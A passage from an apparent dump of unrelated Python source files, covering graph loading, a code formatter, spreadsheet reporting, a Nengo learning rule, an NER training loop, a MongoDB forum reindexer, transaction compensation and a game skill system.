entities_sf = entities_sf.unpack(entities, column_name_prefix='')
entities_sf = entities_sf.unpack('properties', column_name_prefix='')
return entities_sf
def get_sgraph_from_neo4j_json(json_filename):
'''
Reads a JSON file, created by Neo4j, into an SGraph.
Args:
json_filename: The name of the JSON file created by Neo4j.
Returns:
SGraph
'''
# Load json_filename into an SFrame
sf = gl.SFrame.read_csv(json_filename, header=False,
column_type_hints=dict, verbose=False)
# Extract the graph data from sf
sf = sf.unpack('X1', column_name_prefix='')
sf = sf[['data']].stack('data', new_column_name='data')
# Extract nodes and edges
nodes_sf = extract_entities(sf, 'nodes')
edges_sf = extract_entities(sf, 'relationships')
# Create the SGraph
sgraph = gl.SGraph()
sgraph = sgraph.add_edges(edges_sf, src_field='startNode',
dst_field='endNode')
sgraph = sgraph.add_vertices(nodes_sf, vid_field='id')
return sgraph
g = get_sgraph_from_neo4j_json(
'https://static.turi.com/datasets/how-to/movies.json')
print g
# SGraph({'num_edges': 20L, 'num_vertices': 12L})
|
486681
|
class CGXFormatter:
def __init__(self):
self.BASE_INDENT = 4
self.inside_string = False
self.total_indent = 0
self.new_line = True
self.nb_lines = 0
def read_lines(self):
self.nb_lines = int(input())
for _ in range(self.nb_lines):
line = input()
for character in line:
self.read_char(character)
def read_char(self, character: str):
if self.inside_string:
if character == '\'':
self.inside_string = False
self.print_char(character)
else:
self.read_char_outside_string(character)
def read_char_outside_string(self, character: str):
if character == ' ' or character == '\t':
return
if character == '\'':
self.inside_string = True
self.print_char(character)
elif character == '(':
if not self.new_line:
self.print_new_line()
self.print_char(character)
self.print_new_line()
self.total_indent += self.BASE_INDENT
elif character == ')':
self.total_indent -= self.BASE_INDENT
if not self.new_line:
self.print_new_line()
self.print_char(character)
elif character == ';':
self.print_char(character)
self.print_new_line()
else:
self.print_char(character)
def print_char(self, character: str):
if self.new_line:
for _ in range(self.total_indent):
print(' ', end='')
self.new_line = False
print(character, end='')
def print_new_line(self):
print()
self.new_line = True
if __name__ == "__main__":
formatter = CGXFormatter()
formatter.read_lines()
|
486688
|
from __future__ import print_function
import xlsxwriter
"""
MIT License
Copyright (c) 2018 <NAME>, <NAME>
Please share comments and questions at:
https://github.com/PythonForensics/Learning-Python-for-Forensics
or email <EMAIL>
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or
sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
ALPHABET = [chr(i) for i in range(ord('A'), ord('Z') + 1)]
def writer(output, headers, output_data, **kwargs):
"""
The writer function writes excel output for the framework
:param output: the output filename for the excel spreadsheet
:param headers: the name of the spreadsheet columns
:param output_data: the data to be written to the excel
spreadsheet
:return: Nothing
"""
wb = xlsxwriter.Workbook(output)
if headers is None:
print('[-] Received empty headers... \n'
'[-] Skipping writing output.')
return
if len(headers) <= 26:
title_length = ALPHABET[len(headers) - 1]
else:
title_length = 'Z'
ws = add_worksheet(wb, title_length)
if 'recursion' in kwargs.keys():
for i, data in enumerate(output_data):
if i > 0:
ws = add_worksheet(wb, title_length)
cell_length = len(data)
tmp = []
for dictionary in data:
tmp.append(
[str(dictionary[x]) if x in dictionary.keys() else '' for x in headers]
)
ws.add_table(
'A3:' + title_length + str(3 + cell_length),
{'data': tmp,
'columns': [{'header': x} for x in headers]})
else:
cell_length = len(output_data)
tmp = []
for data in output_data:
tmp.append([str(data[x]) if x in data.keys() else '' for x in headers])
ws.add_table(
'A3:' + title_length + str(3 + cell_length),
{'data': tmp,
'columns': [{'header': x} for x in headers]})
wb.close()
def add_worksheet(wb, length, name=None):
"""
The add_worksheet function creates a new formatted worksheet
in the workbook
:param wb: The workbook object
:param length: The range of rows to merge
:param name: The name of the worksheet
:return: ws, the worksheet
"""
title_format = wb.add_format({'bold': True,
'font_color': 'black', 'bg_color': 'white', 'font_size': 30,
'font_name': 'Arial', 'align': 'center'})
ws = wb.add_worksheet(name)
ws.merge_range('A1:' + length + '1', 'XYZ Corp',
title_format)
ws.merge_range('A2:' + length + '2', 'Case ####',
title_format)
return ws
|
486722
|
import numpy as np
from nengo.builder import Builder, Operator, Signal
from nengo.builder.operator import Reset
from nengo.learning_rules import LearningRuleType
from nengo.synapses import SynapseParam, Lowpass
from nengo.version import version_info
__all__ = ['RLS']
class RLS(LearningRuleType):
"""Recursive least-squares rule for online decoder optimization.
This may be used to learn the weights on a :class:`nengo.Connection`,
online, in an L2-optimal manner. To be applied in the same scenarios as
:class:`nengo.PES`, to minimize some error signal.
In the end, the only real difference between RLS learning and using the
:class:`nengo.solvers.LstsqL2` solver, is *when* the learning takes
place. In the former case, the weights are learned online from an error
signal over time, whereas in the latter case, the weights are learned
offline in a batch optimization from the provided training data
(``eval_points`` and ``function``).
The cost of RLS is :math:`\\mathcal{O}\\left(n^2\\right)` extra
time and memory. It is typically much more efficient to do the learning
offline using the :class:`nengo.solvers.LstsqL2` solver.
Parameters
----------
learning_rate : ``float``, optional
Effective learning rate. This is better understood as
:math:`\\frac{1}{\\alpha}`, where :math:`\\alpha` is an
L2-regularization term. A large learning rate means little
regularization, which implies quick over-fitting. A small learning
rate means large regularization, which translates to slower
learning. Defaults to 1.0. [#]_
pre_synapse : :class:`nengo.synapses.Synapse`, optional
Filter applied to the pre-synaptic neural activities, for the
purpose of applying the weight update.
Defaults to a :class:`nengo.Lowpass` filter with a time-constant of
5 ms.
See Also
--------
:class:`nengo.PES`
:class:`nengo.solvers.LstsqL2`
:class:`.Temporal`
Notes
-----
RLS works by maintaining the inverse neural correlation matrix,
:math:`\\Gamma^{-1}`, where :math:`\\Gamma = A^T A + \\alpha I` are the
regularized correlations, :math:`A` is a matrix of (possibly filtered)
neural activities, and :math:`\\alpha` is an L2-regularization term
controlled by the ``learning_rate``. This matrix is used to project the
error signal and update the weights to be L2-optimal, at each time-step.
The time-step does not play a role in this learning rule, apart from
determining the time-scale over which the ``pre_synapse`` is discretized.
A complete learning update is applied on every time-step.
Attributes that can be probed from this learning rule:
``pre_filtered``, ``error``, ``delta``, ``inv_gamma``.
References
----------
.. [#] <NAME>., & <NAME>. (2009). Generating coherent patterns
of activity from chaotic neural networks. Neuron, 63(4), 544-557.
Examples
--------
See :doc:`notebooks/examples/full_force_learning` for an example of how to
use RLS to learn spiking FORCE [1]_ and "full-FORCE" networks in Nengo.
Below, we compare :class:`nengo.PES` against :class:`.RLS`, learning a
feed-forward communication channel (identity function), online,
and starting with 100 spiking LIF neurons from scratch (zero weights).
A faster learning rate for :class:`nengo.PES` results in over-fitting to
the most recent online example, while a slower learning rate does not
learn quickly enough. This is a general problem with greedy optimization.
:class:`.RLS` performs better since it is L2-optimal.
>>> from nengolib import RLS, Network
>>> import nengo
>>> from nengo import PES
>>> tau = 0.005
>>> learning_rules = (PES(learning_rate=1e-3, pre_tau=tau),
>>> RLS(learning_rate=1e-5, pre_synapse=tau))
>>> with Network() as model:
>>> u = nengo.Node(output=lambda t: np.sin(2*np.pi*t))
>>> probes = []
>>> for lr in learning_rules:
>>> e = nengo.Node(size_in=1,
>>> output=lambda t, e: e if t < 1 else 0)
>>> x = nengo.Ensemble(100, 1, seed=0)
>>> y = nengo.Node(size_in=1)
>>>
>>> nengo.Connection(u, e, synapse=None, transform=-1)
>>> nengo.Connection(u, x, synapse=None)
>>> conn = nengo.Connection(
>>> x, y, synapse=None, learning_rule_type=lr,
>>> function=lambda _: 0)
>>> nengo.Connection(y, e, synapse=None)
>>> nengo.Connection(e, conn.learning_rule, synapse=tau)
>>> probes.append(nengo.Probe(y, synapse=tau))
>>> probes.append(nengo.Probe(u, synapse=tau))
>>> with nengo.Simulator(model) as sim:
>>> sim.run(2.0)
>>> import matplotlib.pyplot as plt
>>> plt.plot(sim.trange(), sim.data[probes[0]],
>>> label=str(learning_rules[0]))
>>> plt.plot(sim.trange(), sim.data[probes[1]],
>>> label=str(learning_rules[1]))
>>> plt.plot(sim.trange(), sim.data[probes[2]],
>>> label="Ideal", linestyle='--')
>>> plt.vlines([1], -1, 1, label="Training -> Testing")
>>> plt.ylim(-2, 2)
>>> plt.legend(loc='upper right')
>>> plt.xlabel("Time (s)")
>>> plt.show()
"""
modifies = 'decoders'
probeable = ('pre_filtered', 'error', 'delta', 'inv_gamma')
pre_synapse = SynapseParam('pre_synapse', readonly=True)
def __init__(self, learning_rate=1.0, pre_synapse=Lowpass(tau=0.005)):
if version_info >= (2, 4, 1):
# https://github.com/nengo/nengo/pull/1310
super(RLS, self).__init__(learning_rate, size_in='post_state')
else: # pragma: no cover
self.error_type = 'decoded'
super(RLS, self).__init__(learning_rate)
self.pre_synapse = pre_synapse
def __repr__(self):
return "%s(learning_rate=%r, pre_synapse=%r)" % (
type(self).__name__, self.learning_rate, self.pre_synapse)
class SimRLS(Operator):
"""Nengo backend operator responsible for simulating RLS."""
def __init__(self, pre_filtered, error, delta, inv_gamma, tag=None):
super(SimRLS, self).__init__(tag=tag)
self.sets = []
self.incs = []
self.reads = [pre_filtered, error]
self.updates = [delta, inv_gamma]
@property
def delta(self):
return self.updates[0]
@property
def inv_gamma(self):
return self.updates[1]
@property
def pre_filtered(self):
return self.reads[0]
@property
def error(self):
return self.reads[1]
def _descstr(self):
return 'pre=%s > %s' % (self.pre_filtered, self.delta)
def make_step(self, signals, dt, rng):
r = signals[self.pre_filtered]
delta = signals[self.delta]
error = signals[self.error]
P = signals[self.inv_gamma]
def step_simrls():
# Note: dt is not used in learning rule
rP = r.T.dot(P)
P[...] -= np.outer(P.dot(r), rP) / (1 + rP.dot(r))
delta[...] = -np.outer(error, P.dot(r))
return step_simrls
@Builder.register(RLS)
def build_rls(model, rls, rule):
conn = rule.connection
pre_activities = model.sig[conn.pre_obj]['out']
pre_filtered = (pre_activities
if rls.pre_synapse is None
else model.build(rls.pre_synapse, pre_activities))
# Create input error signal
error = Signal(np.zeros(rule.size_in), name="RLS:error")
model.add_op(Reset(error))
model.sig[rule]['in'] = error
# Create signal for running estimate of inverse correlation matrix
assert pre_filtered.ndim == 1
n_neurons = pre_filtered.shape[0]
inv_gamma = Signal(np.eye(n_neurons) * rls.learning_rate,
name="RLS:inv_gamma")
model.add_op(SimRLS(pre_filtered=pre_filtered,
error=error,
delta=model.sig[rule]['delta'],
inv_gamma=inv_gamma))
# expose these for probes
model.sig[rule]['pre_filtered'] = pre_filtered
model.sig[rule]['error'] = error
model.sig[rule]['inv_gamma'] = inv_gamma
|
486728
|
import time
import torch
import random
import numpy as np
from modules.optimizer import Optimizer
from model.seq_ner import SeqNERModel
from config.conf import args_config, data_config
from utils.dataset import DataLoader
from utils.datautil_seq import load_data, create_vocab, batch_variable, extract_ner_span
import torch.nn.utils as nn_utils
from logger.logger import logger
class Trainer(object):
def __init__(self, args, data_config):
self.args = args
self.data_config = data_config
genre = args.genre
self.train_set, self.val_set, self.test_set = self.build_dataset(data_config, genre)
# self.vocabs = self.build_vocabs(data_config[genre]['train'],
# data_config['pretrain']['word_embedding'],
# data_config['pretrain']['bert_vocab'])
self.vocabs = self.build_vocabs(self.train_set+self.val_set+self.test_set,
data_config['pretrain']['word_embedding'],
data_config['pretrain']['bert_vocab'])
self.model = SeqNERModel(num_wds=len(self.vocabs['word']),
num_chars=len(self.vocabs['char']),
num_tags=len(self.vocabs['tag']),
wd_embed_dim=args.wd_embed_dim,
char_embed_dim=args.char_embed_dim,
tag_embed_dim=args.tag_embed_dim,
bert_embed_dim=args.bert_embed_dim,
hidden_size=args.hidden_size,
num_rnn_layer=args.rnn_depth,
num_lbl=len(self.vocabs['ner']),
dropout=args.dropout,
bert_path=data_path['pretrain']['bert_model'],
num_bert_layer=args.bert_layers,
embed_weight=self.vocabs['word'].embeddings).to(args.device)
print(self.model)
total_params = sum(p.numel() for p in self.model.parameters() if p.requires_grad)
print("Training %d trainable parameters..." % total_params)
def build_dataset(self, data_config, genre='conll_2003'):
train_set = load_data(data_config[genre]['train'])
val_set = load_data(data_config[genre]['dev'])
test_set = load_data(data_config[genre]['test'])
print('train data size:', len(train_set))
print('validate data size:', len(val_set))
print('test data size:', len(test_set))
return train_set, val_set, test_set
'''
def build_vocabs(self, train_data_path, embed_file=None, bert_vocab_path=None):
vocabs = create_vocab(train_data_path, embed_file, bert_vocab_path)
# save_to(self.args.vocab_chkp, vocabs)
return vocabs
'''
def build_vocabs(self, datasets, embed_file=None, bert_vocab_path=None):
vocabs = create_vocab(datasets, embed_file, bert_vocab_path)
# save_to(self.args.vocab_chkp, vocabs)
return vocabs
def calc_train_acc(self, pred_score, gold_tags, mask=None):
'''
:param pred_score: (b, t, nb_tag)
:param gold_tags: (b, t)
:param mask: (b, t) 1对于有效部分,0对应pad
:return:
'''
pred_tags = pred_score.data.argmax(dim=-1)
nb_right = ((pred_tags == gold_tags) * mask).sum().item()
nb_total = mask.sum().item()
return nb_right, nb_total
# BIO eval
def eval_bio_acc(self, pred_tag_ids, gold_tag_ids, mask, ner_vocab, return_prf=False):
'''
:param pred_tag_ids: (b, t)
:param gold_tag_ids: (b, t)
:param mask: (b, t) 0 for padding
:return:
'''
seq_lens = mask.sum(dim=1).tolist()
nb_right, nb_pred, nb_gold = 0, 0, 0
for i, l in enumerate(seq_lens):
pred_tags = ner_vocab.idx2inst(pred_tag_ids[i][:l].tolist())
gold_tags = ner_vocab.idx2inst(gold_tag_ids[i][:l].tolist())
pred_ner_spans = set(extract_ner_span(pred_tags))
gold_ner_spans = set(extract_ner_span(gold_tags))
nb_pred += len(pred_ner_spans)
nb_gold += len(gold_ner_spans)
nb_right += len(pred_ner_spans & gold_ner_spans)
if return_prf:
return self.calc_prf(nb_right, nb_pred, nb_gold)
else:
return nb_right, nb_pred, nb_gold
# BIOES eval
def eval_bioes_acc(self, pred, target, mask, ner_vocab, return_prf=False):
pred = pred.masked_select(mask).tolist()
target = target.masked_select(mask).tolist()
assert len(pred) == len(target)
nb_right, nb_gold, nb_pred = 0, 0, 0
# 统计pred tags中总的实体数
entity_type = None
valid = False
for p in pred:
_type = ner_vocab.idx2inst(p)
if 'S-' in _type:
nb_pred += 1
valid = False
elif 'B-' in _type:
entity_type = _type.split('-')[1]
valid = True
elif 'I-' in _type:
if entity_type != _type.split('-')[1]:
valid = False
elif 'E-' in _type:
if entity_type == _type.split('-')[1] and valid:
nb_pred += 1
valid = False
# 统计gold tags中总实体数以及预测正确的实体数
begin = False
for i, (t, p) in enumerate(zip(target, pred)):
_type = ner_vocab.idx2inst(t)
if 'S-' in _type:
nb_gold += 1
if t == p:
nb_right += 1
elif 'B-' in _type:
if t == p:
begin = True
elif 'I-' in _type:
if t != p:
begin = False
elif 'E-' in _type:
nb_gold += 1
if t == p and begin:
nb_right += 1
begin = False
if return_prf:
return self.calc_prf(nb_right, nb_pred, nb_gold)
else:
return nb_right, nb_pred, nb_gold
def calc_prf(self, nb_right, nb_pred, nb_gold):
p = nb_right / (nb_pred + 1e-30)
r = nb_right / (nb_gold + 1e-30)
f = (2 * nb_right) / (nb_gold + nb_pred + 1e-30)
return p, r, f
def train_eval(self):
train_loader = DataLoader(self.train_set, batch_size=self.args.batch_size, shuffle=True)
self.args.max_step = self.args.epoch * (len(train_loader) // self.args.update_step)
print('max step:', self.args.max_step)
optimizer = Optimizer(filter(lambda p: p.requires_grad, self.model.parameters()), args)
best_dev_metric, best_test_metric = dict(), dict()
patient = 0
for ep in range(1, 1+self.args.epoch):
train_loss = 0.
self.model.train()
t1 = time.time()
train_right, train_total = 0, 0
for i, batcher in enumerate(train_loader):
batch = batch_variable(batcher, self.vocabs)
batch.to_device(self.args.device)
pred_score = self.model(batch.wd_ids, batch.ch_ids, batch.tag_ids, batch.bert_inps)
mask = batch.wd_ids.gt(0)
loss = self.model.tag_loss(pred_score, batch.ner_ids, mask)
loss_val = loss.data.item()
train_loss += loss_val
nb_right, nb_total = self.calc_train_acc(pred_score, batch.ner_ids, mask)
train_right += nb_right
train_total += nb_total
if self.args.update_step > 1:
loss = loss / self.args.update_step
loss.backward()
if (i + 1) % self.args.update_step == 0 or (i == self.args.max_step - 1):
nn_utils.clip_grad_norm_(filter(lambda p: p.requires_grad, self.model.parameters()),
max_norm=self.args.grad_clip)
optimizer.step()
self.model.zero_grad()
logger.info('[Epoch %d] Iter%d time cost: %.2fs, lr: %.6f, train loss: %.3f, ACC: %.3f' % (
ep, i + 1, (time.time() - t1), optimizer.get_lr(), loss_val, train_right/train_total))
dev_metric = self.evaluate('dev')
if dev_metric['f'] > best_dev_metric.get('f', 0):
best_dev_metric = dev_metric
test_metric = self.evaluate('test')
if test_metric['f'] > best_test_metric.get('f', 0):
# check_point = {'model': self.model.state_dict(), 'settings': args}
# torch.save(check_point, self.args.model_chkp)
best_test_metric = test_metric
patient = 0
else:
patient += 1
logger.info('[Epoch %d] train loss: %.4f, lr: %f, patient: %d, dev_metric: %s, test_metric: %s' % (
ep, train_loss, optimizer.get_lr(), patient, best_dev_metric, best_test_metric))
# if patient >= (self.args.patient // 2 + 1): # 训练一定epoch, dev性能不上升, decay lr
# optimizer.lr_decay(0.95)
if patient >= self.args.patient: # early stopping
break
logger.info('Final Metric: %s' % best_test_metric)
def evaluate(self, mode='test'):
if mode == 'dev':
test_loader = DataLoader(self.val_set, batch_size=self.args.test_batch_size)
elif mode == 'test':
test_loader = DataLoader(self.test_set, batch_size=self.args.test_batch_size)
else:
raise ValueError('Invalid Mode!!!')
self.model.eval()
nb_right_all, nb_pred_all, nb_gold_all = 0, 0, 0
with torch.no_grad():
for i, batcher in enumerate(test_loader):
batch = batch_variable(batcher, self.vocabs)
batch.to_device(self.args.device)
pred_score = self.model(batch.wd_ids, batch.ch_ids, batch.tag_ids, batch.bert_inps)
mask = batch.wd_ids.gt(0)
pred_tag_ids = self.model.tag_decode(pred_score, mask)
# nb_right, nb_pred, nb_gold = self.eval_bio_acc(pred_tag_ids, batch.ner_ids, mask, self.vocabs['ner'])
nb_right, nb_pred, nb_gold = self.eval_bioes_acc(pred_tag_ids, batch.ner_ids, mask, self.vocabs['ner'])
nb_right_all += nb_right
nb_pred_all += nb_pred
nb_gold_all += nb_gold
p, r, f = self.calc_prf(nb_right_all, nb_pred_all, nb_gold_all)
return dict(p=p, r=r, f=f)
if __name__ == '__main__':
random.seed(1347)
np.random.seed(2343)
torch.manual_seed(1453)
torch.cuda.manual_seed(1347)
torch.cuda.manual_seed_all(1453)
print('cuda available:', torch.cuda.is_available())
print('cuDNN available:', torch.backends.cudnn.enabled)
print('gpu numbers:', torch.cuda.device_count())
args = args_config()
if torch.cuda.is_available() and args.cuda >= 0:
args.device = torch.device('cuda', args.cuda)
torch.cuda.empty_cache()
else:
args.device = torch.device('cpu')
data_path = data_config('./config/data_path.json')
trainer = Trainer(args, data_path)
trainer.train_eval()
|
486750
|
from datetime import datetime, timedelta
from steem import Steem
from pymongo import MongoClient
from pprint import pprint
import collections
import json
import time
import sys
import os
# Connections
nodes = [
'https://steemd.steemit.com'
]
s = Steem(nodes)
mongo = MongoClient("mongodb://mongo")
db = mongo.forums
data = json.loads(sys.argv[1])
def update_forum(data):
update = {
'$set': data,
'$unset': {
'children': 1
}
}
if 'parent' in data:
parent = db.forums.find_one({'_id': data['parent']})
update['$set'].update({
'parent_name': parent['name']
})
else:
data.pop('parent', None)
data.pop('parent_name', None)
update['$unset'].update({
'parent': True,
'parent_name': True,
})
query = {
'_id': data['_id']
}
results = db.forums.update(query, update, upsert=True)
if results['n'] == 1 and results['updatedExisting'] == False:
pprint("[FORUM][REINDEXER] - Inserting new forum [" + data['_id'] + "]")
if results['n'] == 1 and results['updatedExisting'] == True:
pprint("[FORUM][REINDEXER] - Updating forum [" + data['_id'] + "]")
def update_posts(data):
query = {}
if 'tags' in data and len(data['tags']) > 0:
query.update({'category': {'$in': data['tags']}})
if 'accounts' in data and len(data['accounts']) > 0:
query.update({'author': {'$in': data['accounts']}})
sort = [("last_reply",-1),("created",-1)]
results = db.posts.find(query).sort(sort).limit(1)
for comment in results:
query = {
'_id': data['_id'],
}
updates = {
'updated': comment['created'],
'last_post': {
'created': comment['created'],
'author': comment['author'],
'title': comment['title'],
'url': comment['url']
}
}
pprint("[FORUM][REINDEXER] - Updating latest post to [" + str(comment['_id']) + "]...")
response = db.forums.update(query, {'$set': updates}, upsert=True)
def update_replies(data):
query = {}
if 'tags' in data and len(data['tags']) > 0:
query.update({'category': {'$in': data['tags']}})
if 'accounts' in data and len(data['accounts']) > 0:
query.update({'author': {'$in': data['accounts']}})
sort = [("last_reply",-1),("created",-1)]
results = db.replies.find(query).sort(sort).limit(1)
for comment in results:
query = {
'_id': data['_id'],
}
updates = {
'updated': comment['created'],
'last_reply': {
'created': comment['created'],
'author': comment['author'],
'title': comment['root_title'],
'url': comment['url']
}
}
pprint("[FORUM][REINDEXER] - Updating latest reply to [" + str(comment['_id']) + "]...")
db.forums.update(query, {'$set': updates}, upsert=True)
def update_parent(data):
db.forums.update({
'_id': data['parent'],
'children._id': {'$ne': data['_id']}
}, {
'$addToSet': {
'children': {
'_id': data['_id'],
'name': data['name']
}
}
})
if __name__ == '__main__':
pprint("[FORUM][REINDEXER] - Starting script...")
update_forum(data)
update_posts(data)
update_replies(data)
if 'parent' in data:
update_parent(data)
|
486758
|
import TestVariables
def test_one():
TestVariables.test_value = 1
assert True
def test_two():
assert TestVariables.test_value == 1
|
486813
|
from typing import Tuple, Any, List, Iterable
from .async_transactions import has_async_execute
from .exceptions import CompensationFailure, AsyncStepUsedInSyncTransaction
from .retries import StepWithRetries, execute_step_retry
from .steps import build_step_list, StepLike, Step
def _compensate_completed_steps(completed_steps: List[Tuple[Step, Any]]):
failures = []
for (step, state) in reversed(completed_steps):
try:
step.compensate(state)
except Exception as failure:
failures.append(failure)
if failures != []:
raise CompensationFailure(failures)
def _execute_step(state, step: Step):
try:
return step.execute(state)
except Exception as e:
if isinstance(step, StepWithRetries):
return execute_step_retry(state, step, [e])
raise e
def run_transaction(steps: Iterable[StepLike], starting_state=None):
steps = build_step_list(steps)
completed_steps: List[Tuple[Step, Any]] = []
state = starting_state
try:
for step in steps:
if has_async_execute(step):
raise AsyncStepUsedInSyncTransaction
state = _execute_step(state, step)
completed_steps.append((step, state))
return state
except Exception as error:
_compensate_completed_steps(completed_steps)
raise error
|
486817
|
from setuptools import setup
from django_admin_logs import __version__
with open('README.rst') as readme_file:
README = readme_file.read()
with open('CHANGELOG.rst') as changelog_file:
CHANGELOG = changelog_file.read()
setup(
name='django-admin-logs',
version=__version__,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/radwon/django-admin-logs',
description='View, delete or disable Django admin log entries.',
long_description=README + '\n\n' + CHANGELOG,
long_description_content_type='text/x-rst',
keywords='django admin logs',
license='MIT',
packages=[
'django_admin_logs',
],
include_package_data=True,
classifiers=[
'Intended Audience :: Developers',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
'Framework :: Django',
'Environment :: Web Environment',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
python_requires='>=3.6',
install_requires=[
'Django>=2.2',
],
)
|
486844
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.mode_choice import mode_choice
def test_mode_choice():
"""Test module mode_choice.py by downloading
mode_choice.csv and testing shape of
extracted data has 840 rows and 7 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = mode_choice(test_path)
try:
assert x_train.shape == (840, 7)
except:
shutil.rmtree(test_path)
raise()
|
486970
|
from skills import skillsets
class SkillHandler():
def __init__(self, owner):
self.owner = owner
self.generate_skillset_dics()
def generate_skillset_dics(self):
owner = self.owner
skillset_dics = {}
for i in skillsets.VIABLE_SKILLSETS:
if owner.attributes.has(i):
skillset_dic = dict(owner.attributes.get(i))
skillset_dics[i] = skillset_dic
self.skillset_dics = skillset_dics
def generate_ap(self):
ap_granted = 1
# Here is where modifiers will kick in, such as rolling for the chance at extra AP.
return ap_granted
def ap_required(self, desired_rank):
ap_per_rank = 100
count = 0
for _ in range(2, desired_rank+1):
count += 1
if count == 20:
ap_per_rank += 10
count = 0
return ap_per_rank
def return_rank_score(self, rank, difficulty):
if difficulty == 'easy':
rs = skillsets.easy_rs
elif difficulty == 'average':
rs = skillsets.average_rs
elif difficulty == 'difficult':
rs = skillsets.difficult_rs
elif difficulty == 'impossible':
rs = skillsets.impossible_rs
rs = rs[rank - 1]
return rs
def return_defense_skills(self, skillset, rs_only=False, skills_only=False):
high_rs, mid_rs, low_rs = 0, 0, 0
high_skill, mid_skill, low_skill = '', '', ''
rank = 0
difficulty = ''
defense_skill_list = []
skills = [*self.skillset_dics[skillset]] # Create a list of the skill names.
# Check each key in the dictionary against all viable skills.
for i in skills:
if i in skillsets.skillsets[skillset]:
# Skill is in the main dictionary. Check if it's a defense skill.
if skillsets.skillsets[skillset][i]['skill_type'] == 'defense':
defense_skill_list.append(i)
# Sort each defensive skill by region defended.
for i in defense_skill_list:
rank = self.return_skill_rank(skillset, i)
difficulty = skillsets.skillsets[skillset][i]['difficulty']
if skillsets.skillsets[skillset][i]['default_aim'] == 'high':
high_rs = self.return_rank_score(rank, difficulty)
high_skill = skillsets.skillsets[skillset][i]['uid']
elif skillsets.skillsets[skillset][i]['default_aim'] == 'mid':
mid_rs = self.return_rank_score(rank, difficulty)
mid_skill = skillsets.skillsets[skillset][i]['uid']
elif skillsets.skillsets[skillset][i]['default_aim'] == 'low':
low_rs = self.return_rank_score(rank, difficulty)
low_skill = skillsets.skillsets[skillset][i]['uid']
# Return the values
if rs_only == True:
return high_rs, mid_rs, low_rs
elif skills_only == True:
return high_skill, mid_skill, low_skill
else:
return high_rs, mid_rs, low_rs, high_skill, mid_skill, low_skill
def defense_layer_calc(self, rs_only=False, skills_only=False):
"""
Defensive rank score includes up to 3 layers of defense.
The highest RS defensive manuever of each high, mid, and low will gain 100% of it's RS.
The second highest RS will supply 50% and the third will only be worth 33%.
Each layer can only consist of a single defensive manuever from each of the following categories:
Weapon Blocks, Combat Manuever Dodges, and Shield Blocks.
Weapons that require 2 hands can only ever gain 2 defensive layers.
Shields or offhand weapons are the only way to gain all 3 layers.
For Example:
Staves Mid Block with 100 rank score * 1 = 100
CM Mid Dodge with 80 rank score * 0.5 = 40
Total Mid Defensive rank score = 140
Swords Mid Block with 100 rank score * 0.33 = 33
CM Mid Dodge with 150 rank score * 0.5 = 75
Shield Mid Block with 200 rank score * 1 = 200
Total Mid Defensive rank score = 308
Floats are used to determine the highest RS priority, but only rounded down integers are used to determine the total RS.
TODO: Add a round down for the final RS.
High, Mid, and Low always refer to the area
of the body that the attack targets and not the numerical value.
"""
owner = self.owner
weap_high_skill, weap_mid_skill, weap_low_skill = None, None, None
offhand_high_skill, offhand_mid_skill, offhand_low_skill = None, None, None
dodge_high_skill, dodge_mid_skill, dodge_low_skill = None, None, None
# Initialize rankscore values.
weap_high_rs, weap_mid_rs, weap_low_rs = 0.0, 0.0, 0.0
offhand_high_rs, offhand_mid_rs, offhand_low_rs = 0.0, 0.0, 0.0
dodge_high_rs, dodge_mid_rs, dodge_low_rs = 0.0, 0.0, 0.0
# Acquire the item(s) wielded.
if owner.attributes.has('wielding'):
wielding = owner.attributes.get('wielding')
main_wield = wielding.get('main')
off_wield = wielding.get('off')
b_wield = wielding.get('both')
if b_wield:
if b_wield.attributes.has('skillset'):
item_skillset = b_wield.attributes.get('skillset')
weap_high_rs, weap_mid_rs, weap_low_rs = self.return_defense_skills(item_skillset, rs_only=True)
weap_high_skill, weap_mid_skill, weap_low_skill = self.return_defense_skills(item_skillset, skills_only=True)
if main_wield:
if main_wield.attributes.has('skillset'):
item_skillset = main_wield.attributes.get('skillset')
weap_high_rs, weap_mid_rs, weap_low_rs = self.return_defense_skills(item_skillset, rs_only=True)
weap_high_skill, weap_mid_skill, weap_low_skill = self.return_defense_skills(item_skillset, skills_only=True)
if off_wield:
if off_wield.attributes.has('skillset'):
item_skillset = off_wield.attributes.get('skillset')
offhand_high_rs, offhand_mid_rs, offhand_low_rs = self.return_defense_skills(item_skillset, rs_only=True)
offhand_high_skill, offhand_mid_skill, offhand_low_skill = self.return_defense_skills(item_skillset, skills_only=True)
# Get all dodge rank scores
if owner.attributes.has('martial arts'):
dodge_high_skill, dodge_mid_skill, dodge_low_skill = self.return_defense_skills('martial arts', skills_only=True)
dodge_high_rs, dodge_mid_rs, dodge_low_rs = self.return_defense_skills('martial arts', rs_only=True)
high_skills = [weap_high_skill, offhand_high_skill, dodge_high_skill]
mid_skills = [weap_mid_skill, offhand_mid_skill, dodge_mid_skill]
low_skills = [weap_low_skill, offhand_low_skill, dodge_low_skill]
# High Layer
h_rs = [weap_high_rs, offhand_high_rs, dodge_high_rs]
h_rs.sort(reverse=True)
h_layer1 = h_rs[0] * 1
h_layer2 = h_rs[1] * 0.5
h_layer3 = h_rs[2] * 0.33
high_def_rs = (h_layer1 + h_layer2 + h_layer3)
# Mid Layer
